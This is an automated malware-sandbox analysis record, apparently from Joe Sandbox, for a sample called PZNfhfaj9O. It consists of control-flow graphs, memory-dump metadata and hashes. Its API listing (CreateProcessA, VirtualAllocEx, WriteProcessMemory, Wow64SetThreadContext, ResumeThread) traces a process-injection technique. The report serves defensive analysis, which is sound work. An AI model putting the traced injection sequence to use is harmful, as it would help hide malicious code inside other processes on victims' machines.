                                                                                control_flow_graph 654 766b61f-766b6b5 657 766b6b7-766b6c1 654->657 658 766b6ee-766b70e 654->658 657->658 659 766b6c3-766b6c5 657->659 663 766b747-766b776 658->663 664 766b710-766b71a 658->664 661 766b6c7-766b6d1 659->661 662 766b6e8-766b6eb 659->662 665 766b6d5-766b6e4 661->665 666 766b6d3 661->666 662->658 674 766b7af-766b869 CreateProcessA 663->674 675 766b778-766b782 663->675 664->663 667 766b71c-766b71e 664->667 665->665 668 766b6e6 665->668 666->665 669 766b720-766b72a 667->669 670 766b741-766b744 667->670 668->662 672 766b72e-766b73d 669->672 673 766b72c 669->673 670->663 672->672 676 766b73f 672->676 673->672 686 766b872-766b8f8 674->686 687 766b86b-766b871 674->687 675->674 677 766b784-766b786 675->677 676->670 679 766b788-766b792 677->679 680 766b7a9-766b7ac 677->680 681 766b796-766b7a5 679->681 682 766b794 679->682 680->674 681->681 683 766b7a7 681->683 682->681 683->680 697 766b8fa-766b8fe 686->697 698 766b908-766b90c 686->698 687->686 697->698 701 766b900 697->701 699 766b90e-766b912 698->699 700 766b91c-766b920 698->700 699->700 702 766b914 699->702 703 766b922-766b926 700->703 704 766b930-766b934 700->704 701->698 702->700 703->704 705 766b928 703->705 706 766b946-766b94d 704->706 707 766b936-766b93c 704->707 705->704 708 766b964 706->708 709 766b94f-766b95e 706->709 707->706 710 766b965 708->710 709->708 710->710
                                                                                APIs
                                                                                • CreateProcessA.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 0766B856
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1870205941.0000000007660000.00000040.00000800.00020000.00000000.sdmp, Offset: 07660000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_7660000_PZNfhfaj9O.jbxd
                                                                                Similarity
                                                                                • API ID: CreateProcess
                                                                                • String ID:
                                                                                • API String ID: 963392458-0
                                                                                • Opcode ID: baf71602092083de33adb99964d1d1db9869eed13ea192feed77a3bb3873e6a0
                                                                                • Instruction ID: 435bbf7daa36ee9c85626b0c5b99c01980e861536ade268182027da0f8473f36
                                                                                • Opcode Fuzzy Hash: baf71602092083de33adb99964d1d1db9869eed13ea192feed77a3bb3873e6a0
                                                                                • Instruction Fuzzy Hash: A9915AB1D0025ADFDF24DF68C885BEDBBB2AF48310F6485A9D809E7240DB749985CF91

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 712 766b620-766b6b5 714 766b6b7-766b6c1 712->714 715 766b6ee-766b70e 712->715 714->715 716 766b6c3-766b6c5 714->716 720 766b747-766b776 715->720 721 766b710-766b71a 715->721 718 766b6c7-766b6d1 716->718 719 766b6e8-766b6eb 716->719 722 766b6d5-766b6e4 718->722 723 766b6d3 718->723 719->715 731 766b7af-766b869 CreateProcessA 720->731 732 766b778-766b782 720->732 721->720 724 766b71c-766b71e 721->724 722->722 725 766b6e6 722->725 723->722 726 766b720-766b72a 724->726 727 766b741-766b744 724->727 725->719 729 766b72e-766b73d 726->729 730 766b72c 726->730 727->720 729->729 733 766b73f 729->733 730->729 743 766b872-766b8f8 731->743 744 766b86b-766b871 731->744 732->731 734 766b784-766b786 732->734 733->727 736 766b788-766b792 734->736 737 766b7a9-766b7ac 734->737 738 766b796-766b7a5 736->738 739 766b794 736->739 737->731 738->738 740 766b7a7 738->740 739->738 740->737 754 766b8fa-766b8fe 743->754 755 766b908-766b90c 743->755 744->743 754->755 758 766b900 754->758 756 766b90e-766b912 755->756 757 766b91c-766b920 755->757 756->757 759 766b914 756->759 760 766b922-766b926 757->760 761 766b930-766b934 757->761 758->755 759->757 760->761 762 766b928 760->762 763 766b946-766b94d 761->763 764 766b936-766b93c 761->764 762->761 765 766b964 763->765 766 766b94f-766b95e 763->766 764->763 767 766b965 765->767 766->765 767->767
                                                                                APIs
                                                                                • CreateProcessA.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 0766B856
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1870205941.0000000007660000.00000040.00000800.00020000.00000000.sdmp, Offset: 07660000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_7660000_PZNfhfaj9O.jbxd
                                                                                Similarity
                                                                                • API ID: CreateProcess
                                                                                • String ID:
                                                                                • API String ID: 963392458-0
                                                                                • Opcode ID: 2d6ce9e186a7cc48bf8d5ade02b4e3c1fd246fbbbeb2181c6fe364b7a6420923
                                                                                • Instruction ID: 0c3b4691654b22a1af580212179b369e46a225a55a4a53771460f530befe0e03
                                                                                • Opcode Fuzzy Hash: 2d6ce9e186a7cc48bf8d5ade02b4e3c1fd246fbbbeb2181c6fe364b7a6420923
                                                                                • Instruction Fuzzy Hash: 71915AB1D0025ACFDF24DF68C885BEDBBB2AF48310F6485A9D809E7240DB749985CF91

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 769 2cdadc8-2cdadd7 770 2cdadd9-2cdade6 call 2cd93f4 769->770 771 2cdae03-2cdae07 769->771 776 2cdadfc 770->776 777 2cdade8 770->777 773 2cdae09-2cdae13 771->773 774 2cdae1b-2cdae5c 771->774 773->774 780 2cdae5e-2cdae66 774->780 781 2cdae69-2cdae77 774->781 776->771 824 2cdadee call 2cdb051 777->824 825 2cdadee call 2cdb060 777->825 780->781 782 2cdae79-2cdae7e 781->782 783 2cdae9b-2cdae9d 781->783 785 2cdae89 782->785 786 2cdae80-2cdae87 call 2cda130 782->786 788 2cdaea0-2cdaea7 783->788 784 2cdadf4-2cdadf6 784->776 787 2cdaf38-2cdaff8 784->787 790 2cdae8b-2cdae99 785->790 786->790 819 2cdaffa-2cdaffd 787->819 820 2cdb000-2cdb02b GetModuleHandleW 787->820 791 2cdaea9-2cdaeb1 788->791 792 2cdaeb4-2cdaebb 788->792 790->788 791->792 794 2cdaebd-2cdaec5 792->794 795 2cdaec8-2cdaed1 call 2cda140 792->795 794->795 800 2cdaede-2cdaee3 795->800 801 2cdaed3-2cdaedb 795->801 802 2cdaee5-2cdaeec 800->802 803 2cdaf01-2cdaf0e 800->803 801->800 802->803 805 2cdaeee-2cdaefe call 2cda150 call 2cda160 802->805 810 2cdaf31-2cdaf37 803->810 811 2cdaf10-2cdaf2e 803->811 805->803 811->810 819->820 821 2cdb02d-2cdb033 820->821 822 2cdb034-2cdb048 820->822 821->822 824->784 825->784
                                                                                APIs
                                                                                • GetModuleHandleW.KERNEL32(00000000), ref: 02CDB01E
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1865370174.0000000002CD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02CD0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_2cd0000_PZNfhfaj9O.jbxd
                                                                                Similarity
                                                                                • API ID: HandleModule
                                                                                • String ID:
                                                                                • API String ID: 4139908857-0
                                                                                • Opcode ID: b1e9ea5c9ddd0518094b70ea925e1f6baef579e836cd5f11e3f0b7ccff875d12
                                                                                • Instruction ID: ed22f05cdc17c902d0c168de1ca672f645d335fcb0e877844e366cf284d6ef5c
                                                                                • Opcode Fuzzy Hash: b1e9ea5c9ddd0518094b70ea925e1f6baef579e836cd5f11e3f0b7ccff875d12
                                                                                • Instruction Fuzzy Hash: FC7122B0A00B458FD724DF2AD44475ABBF2FF88304F008A2ED58A9BB50D775E955CB90

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 826 2cd5914-2cd591e 827 2cd5920-2cd59e1 CreateActCtxA 826->827 829 2cd59ea-2cd5a44 827->829 830 2cd59e3-2cd59e9 827->830 837 2cd5a46-2cd5a49 829->837 838 2cd5a53-2cd5a57 829->838 830->829 837->838 839 2cd5a59-2cd5a65 838->839 840 2cd5a68-2cd5a98 838->840 839->840 844 2cd5a4a-2cd5a4f 840->844 845 2cd5a9a-2cd5b1c 840->845 844->838
                                                                                APIs
                                                                                • CreateActCtxA.KERNEL32(?), ref: 02CD59D1
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1865370174.0000000002CD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02CD0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_2cd0000_PZNfhfaj9O.jbxd
                                                                                Similarity
                                                                                • API ID: Create
                                                                                • String ID:
                                                                                • API String ID: 2289755597-0
                                                                                • Opcode ID: aad2ca0e15ba98c030cb5dc885aa4225475a4dcdd96a032abf2ecdcfaf0f9564
                                                                                • Instruction ID: 22939e240e2ffdc2ee3148f3cdd95ac8ad6801f984332f5265bc286e06a5c3a9
                                                                                • Opcode Fuzzy Hash: aad2ca0e15ba98c030cb5dc885aa4225475a4dcdd96a032abf2ecdcfaf0f9564
                                                                                • Instruction Fuzzy Hash: DE4113B0C00619CFDB24CFAAC884BCDBBF5BF49304F60805AD408AB255DBB5694ACF90

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 848 2cd44b4-2cd59e1 CreateActCtxA 851 2cd59ea-2cd5a44 848->851 852 2cd59e3-2cd59e9 848->852 859 2cd5a46-2cd5a49 851->859 860 2cd5a53-2cd5a57 851->860 852->851 859->860 861 2cd5a59-2cd5a65 860->861 862 2cd5a68-2cd5a98 860->862 861->862 866 2cd5a4a-2cd5a4f 862->866 867 2cd5a9a-2cd5b1c 862->867 866->860
                                                                                APIs
                                                                                • CreateActCtxA.KERNEL32(?), ref: 02CD59D1
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1865370174.0000000002CD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02CD0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_2cd0000_PZNfhfaj9O.jbxd
                                                                                Similarity
                                                                                • API ID: Create
                                                                                • String ID:
                                                                                • API String ID: 2289755597-0
                                                                                • Opcode ID: 76f1a180ca0e6368bb36328cae259aa9e343961b6f9cc95fa70faef89b563477
                                                                                • Instruction ID: c76b4b0ffa98afbd3a62980438f454daa944342ca91c2c3e94cf23fc4d483397
                                                                                • Opcode Fuzzy Hash: 76f1a180ca0e6368bb36328cae259aa9e343961b6f9cc95fa70faef89b563477
                                                                                • Instruction Fuzzy Hash: FB41E3B0D00619CBDB24CFAAC884BDEBBF5FF49314F60806AD508AB255DBB56945CF90

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 870 766b390-766b3e6 873 766b3f6-766b435 WriteProcessMemory 870->873 874 766b3e8-766b3f4 870->874 876 766b437-766b43d 873->876 877 766b43e-766b46e 873->877 874->873 876->877
                                                                                APIs
                                                                                • WriteProcessMemory.KERNEL32(?,?,00000000,?,?), ref: 0766B428
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1870205941.0000000007660000.00000040.00000800.00020000.00000000.sdmp, Offset: 07660000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_7660000_PZNfhfaj9O.jbxd
                                                                                Similarity
                                                                                • API ID: MemoryProcessWrite
                                                                                • String ID:
                                                                                • API String ID: 3559483778-0
                                                                                • Opcode ID: 27fa9e3cfbe510c54470497268c4455d8482f449af6b6a974772539e0bd9b3a1
                                                                                • Instruction ID: 496015b7f3c5250687e999e99a11a0aced644b73accf3400419656da0403ab39
                                                                                • Opcode Fuzzy Hash: 27fa9e3cfbe510c54470497268c4455d8482f449af6b6a974772539e0bd9b3a1
                                                                                • Instruction Fuzzy Hash: 932128B1900249DFDB10CFA9C885AEEBBF5FF48320F508429E919A7240D7789944CBA5

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 881 766b398-766b3e6 883 766b3f6-766b435 WriteProcessMemory 881->883 884 766b3e8-766b3f4 881->884 886 766b437-766b43d 883->886 887 766b43e-766b46e 883->887 884->883 886->887
                                                                                APIs
                                                                                • WriteProcessMemory.KERNEL32(?,?,00000000,?,?), ref: 0766B428
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1870205941.0000000007660000.00000040.00000800.00020000.00000000.sdmp, Offset: 07660000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_7660000_PZNfhfaj9O.jbxd
                                                                                Similarity
                                                                                • API ID: MemoryProcessWrite
                                                                                • String ID:
                                                                                • API String ID: 3559483778-0
                                                                                • Opcode ID: cb40da8a1714159546c50f59acc48b43420a8f3694de7ac28cda1bb1e20fdc7b
                                                                                • Instruction ID: e4e9f0c578b97896b29f34e145fbc820576e70c7c50e0f33006bca21fc98d4f7
                                                                                • Opcode Fuzzy Hash: cb40da8a1714159546c50f59acc48b43420a8f3694de7ac28cda1bb1e20fdc7b
                                                                                • Instruction Fuzzy Hash: BE2126B1900259DFDB10CFAAC885BEEBBF5FF48320F548429E919A7240D7789944CBA0

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 891 2cdd698-2cdd69c 892 2cdd69e-2cdd6df 891->892 893 2cdd6e2-2cdd734 DuplicateHandle 891->893 892->893 894 2cdd73d-2cdd75a 893->894 895 2cdd736-2cdd73c 893->895 895->894
                                                                                APIs
                                                                                • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 02CDD727
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1865370174.0000000002CD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02CD0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_2cd0000_PZNfhfaj9O.jbxd
                                                                                Similarity
                                                                                • API ID: DuplicateHandle
                                                                                • String ID:
                                                                                • API String ID: 3793708945-0
                                                                                APIs
                                                                                • ReadProcessMemory.KERNEL32(?,?,?,?,?), ref: 0766B508
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1870205941.0000000007660000.00000040.00000800.00020000.00000000.sdmp, Offset: 07660000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_7660000_PZNfhfaj9O.jbxd
                                                                                Similarity
                                                                                • API ID: MemoryProcessRead
                                                                                • String ID:
                                                                                • API String ID: 1726664587-0

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 898 766adc7-766ae13 901 766ae15-766ae21 898->901 902 766ae23-766ae53 Wow64SetThreadContext 898->902 901->902 904 766ae55-766ae5b 902->904 905 766ae5c-766ae8c 902->905 904->905
                                                                                APIs
                                                                                • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 0766AE46
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1870205941.0000000007660000.00000040.00000800.00020000.00000000.sdmp, Offset: 07660000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_7660000_PZNfhfaj9O.jbxd
                                                                                Similarity
                                                                                • API ID: ContextThreadWow64
                                                                                • String ID:
                                                                                • API String ID: 983334009-0
                                                                                APIs
                                                                                • ReadProcessMemory.KERNEL32(?,?,?,?,?), ref: 0766B508
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1870205941.0000000007660000.00000040.00000800.00020000.00000000.sdmp, Offset: 07660000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_7660000_PZNfhfaj9O.jbxd
                                                                                Similarity
                                                                                • API ID: MemoryProcessRead
                                                                                • String ID:
                                                                                • API String ID: 1726664587-0
                                                                                APIs
                                                                                • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 0766AE46
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1870205941.0000000007660000.00000040.00000800.00020000.00000000.sdmp, Offset: 07660000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_7660000_PZNfhfaj9O.jbxd
                                                                                Similarity
                                                                                • API ID: ContextThreadWow64
                                                                                • String ID:
                                                                                • API String ID: 983334009-0
                                                                                APIs
                                                                                • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 02CDD727
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1865370174.0000000002CD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02CD0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_2cd0000_PZNfhfaj9O.jbxd
                                                                                Similarity
                                                                                • API ID: DuplicateHandle
                                                                                • String ID:
                                                                                • API String ID: 3793708945-0
                                                                                APIs
                                                                                • VirtualAllocEx.KERNEL32(?,?,?,?,?), ref: 0766B346
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1870205941.0000000007660000.00000040.00000800.00020000.00000000.sdmp, Offset: 07660000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_7660000_PZNfhfaj9O.jbxd
                                                                                Similarity
                                                                                • API ID: AllocVirtual
                                                                                • String ID:
                                                                                • API String ID: 4275171209-0
                                                                                APIs
                                                                                • VirtualAllocEx.KERNEL32(?,?,?,?,?), ref: 0766B346
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1870205941.0000000007660000.00000040.00000800.00020000.00000000.sdmp, Offset: 07660000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_7660000_PZNfhfaj9O.jbxd
                                                                                Similarity
                                                                                • API ID: AllocVirtual
                                                                                • String ID:
                                                                                • API String ID: 4275171209-0
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1870205941.0000000007660000.00000040.00000800.00020000.00000000.sdmp, Offset: 07660000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_7660000_PZNfhfaj9O.jbxd
                                                                                Similarity
                                                                                • API ID: ResumeThread
                                                                                • String ID:
                                                                                • API String ID: 947044025-0
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1870205941.0000000007660000.00000040.00000800.00020000.00000000.sdmp, Offset: 07660000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_7660000_PZNfhfaj9O.jbxd
                                                                                Similarity
                                                                                • API ID: ResumeThread
                                                                                • String ID:
                                                                                • API String ID: 947044025-0
                                                                                APIs
                                                                                • PostMessageW.USER32(?,00000010,00000000,?), ref: 0766FAF5
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1870205941.0000000007660000.00000040.00000800.00020000.00000000.sdmp, Offset: 07660000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_7660000_PZNfhfaj9O.jbxd
                                                                                Similarity
                                                                                • API ID: MessagePost
                                                                                • String ID:
                                                                                • API String ID: 410705778-0
                                                                                APIs
                                                                                • GetModuleHandleW.KERNEL32(00000000), ref: 02CDB01E
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1865370174.0000000002CD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02CD0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_2cd0000_PZNfhfaj9O.jbxd
                                                                                Similarity
                                                                                • API ID: HandleModule
                                                                                • String ID:
                                                                                • API String ID: 4139908857-0
                                                                                APIs
                                                                                • PostMessageW.USER32(?,00000010,00000000,?), ref: 0766FAF5
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1870205941.0000000007660000.00000040.00000800.00020000.00000000.sdmp, Offset: 07660000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_7660000_PZNfhfaj9O.jbxd
                                                                                Similarity
                                                                                • API ID: MessagePost
                                                                                • String ID:
                                                                                • API String ID: 410705778-0
                                                                                APIs
                                                                                • ReadProcessMemory.KERNEL32(?,?,?,?,?), ref: 0766B508
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1870205941.0000000007660000.00000040.00000800.00020000.00000000.sdmp, Offset: 07660000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_7660000_PZNfhfaj9O.jbxd
                                                                                Similarity
                                                                                • API ID: MemoryProcessRead
                                                                                • String ID:
                                                                                • API String ID: 1726664587-0
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1872374871.000000000B020000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B020000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_b020000_PZNfhfaj9O.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: <
                                                                                • API String ID: 0-4251816714
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1872374871.000000000B020000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B020000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_b020000_PZNfhfaj9O.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: <
                                                                                • API String ID: 0-4251816714
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1862796935.000000000125D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0125D000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_125d000_PZNfhfaj9O.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1862796935.000000000125D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0125D000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_125d000_PZNfhfaj9O.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1862796935.000000000125D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0125D000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_125d000_PZNfhfaj9O.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: d3e4ffdf7fbf327f1977df5466010dce74015cfb9413ea2def157c2228495118
                                                                                • Instruction ID: 76f907754fa13fa2c89fef90aa8bf98974eb7480686f73562ce6d8d529977e60
                                                                                • Opcode Fuzzy Hash: d3e4ffdf7fbf327f1977df5466010dce74015cfb9413ea2def157c2228495118
                                                                                • Instruction Fuzzy Hash: 8B219D755093848FDB13CF64D9D0B15BF71EB46314F28C5EAD9498B2A7C33A980ACB62
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1862796935.000000000125D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0125D000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_125d000_PZNfhfaj9O.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 8bad08bc3297c4791243414a9a82218353e3075920b51f23bb46501d1989d77c
                                                                                • Instruction ID: 2da597a1b10f1e79c296570e8202caeb474f61ad055537069765ad241f59c8d4
                                                                                • Opcode Fuzzy Hash: 8bad08bc3297c4791243414a9a82218353e3075920b51f23bb46501d1989d77c
                                                                                • Instruction Fuzzy Hash: 3411BB75504284DFDB12CF54C5C0B15BBA1FB84224F24C6ADDD498B297C33AD44ACB61
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1862134583.000000000104D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0104D000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_104d000_PZNfhfaj9O.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: f504fd931e9eb1103f6c8709d3fa7de6dc632de3ce30e327459c81157dcfad8b
                                                                                • Instruction ID: 426ca258ebe2e0b84eeea4841f81edbf9719d0b642ac1a93982164afe59458ac
                                                                                • Opcode Fuzzy Hash: f504fd931e9eb1103f6c8709d3fa7de6dc632de3ce30e327459c81157dcfad8b
                                                                                • Instruction Fuzzy Hash: D601FCB11043809BE750DB9ACCC4B66FFE8FF51724F188866ED490E246D3789840C771
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1862134583.000000000104D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0104D000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_104d000_PZNfhfaj9O.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 0c7665c4af7038066d15dd12d382697d8c98c5c287749ed2829edb68dd5d249c
                                                                                • Instruction ID: b70c0034b46dea66d59b742de34b8eeff31e0e1553f71921e71dc048f65b2f93
                                                                                • Opcode Fuzzy Hash: 0c7665c4af7038066d15dd12d382697d8c98c5c287749ed2829edb68dd5d249c
                                                                                • Instruction Fuzzy Hash: 26F0AF72004280AAE7218A0AC8C4B62FFE8EB51624F18C45AED484B286C279A844CBB1
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1870205941.0000000007660000.00000040.00000800.00020000.00000000.sdmp, Offset: 07660000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_7660000_PZNfhfaj9O.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 9cc92f272f14339a37d2d55139c6e3d440116ef6db663c999d6322f6a32d5212
                                                                                • Instruction ID: dff017bf0286f54c1a0a95c7c916757006e1b86f81546e1340078258bf19a1ba
                                                                                • Opcode Fuzzy Hash: 9cc92f272f14339a37d2d55139c6e3d440116ef6db663c999d6322f6a32d5212
                                                                                • Instruction Fuzzy Hash: E1222AB4E002558FCB14CFA9C5889ADBBF2AF88304F64C159D415BB356D731AC86CFA0
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1870205941.0000000007660000.00000040.00000800.00020000.00000000.sdmp, Offset: 07660000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_7660000_PZNfhfaj9O.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: e33927960b84b72ebce9f76448ca293069a64a92d2483c9d45bd62b3ffc23e8b
                                                                                • Instruction ID: 8460f7087c687298138c457d0385fb7dbfc6b70bb2692827a0752769801ee124
                                                                                • Opcode Fuzzy Hash: e33927960b84b72ebce9f76448ca293069a64a92d2483c9d45bd62b3ffc23e8b
                                                                                • Instruction Fuzzy Hash: B0E1ECB4E0425A8FCB14DFA9C5849AEFBF2FF89304F248169D415AB355D730A942CFA1
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1870205941.0000000007660000.00000040.00000800.00020000.00000000.sdmp, Offset: 07660000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_7660000_PZNfhfaj9O.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 20b8a3821be9374793cb00de70dfadd75a162af93ca882241e8be7e59750a51e
                                                                                • Instruction ID: 360582b5b3c78e2750bdd79cd2945bdf1bc756b68a8c0f5c13e492a4a8e5b0db
                                                                                • Opcode Fuzzy Hash: 20b8a3821be9374793cb00de70dfadd75a162af93ca882241e8be7e59750a51e
                                                                                • Instruction Fuzzy Hash: 23E1E6B4E00259CFCB14DFA9C5849AEFBB2BF89304F248169D419AB355D731A942CFA1
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1870205941.0000000007660000.00000040.00000800.00020000.00000000.sdmp, Offset: 07660000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_7660000_PZNfhfaj9O.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 7d0cceef785023b51d1714dc13d90c38ce1251dc50c1219f1bbe83415b64d598
                                                                                • Instruction ID: 98971813d4c665820019d3432835fd0b70e5710a579d3eb2f5fdc42988af68b8
                                                                                • Opcode Fuzzy Hash: 7d0cceef785023b51d1714dc13d90c38ce1251dc50c1219f1bbe83415b64d598
                                                                                • Instruction Fuzzy Hash: 3EE10BB4E042598FCB14DFA9C5849AEFBB2FF89304F248169D815AB355D731A942CFA0
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1870205941.0000000007660000.00000040.00000800.00020000.00000000.sdmp, Offset: 07660000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_7660000_PZNfhfaj9O.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 21bd9c76e90a9e509ed5b6b471f277fa9853c6a06cb6ac4078a814b57be7915e
                                                                                • Instruction ID: 845f1d5087e39e452e8627cd16c724eb4bb7b1af4e4c74cc3f36a7a56209496e
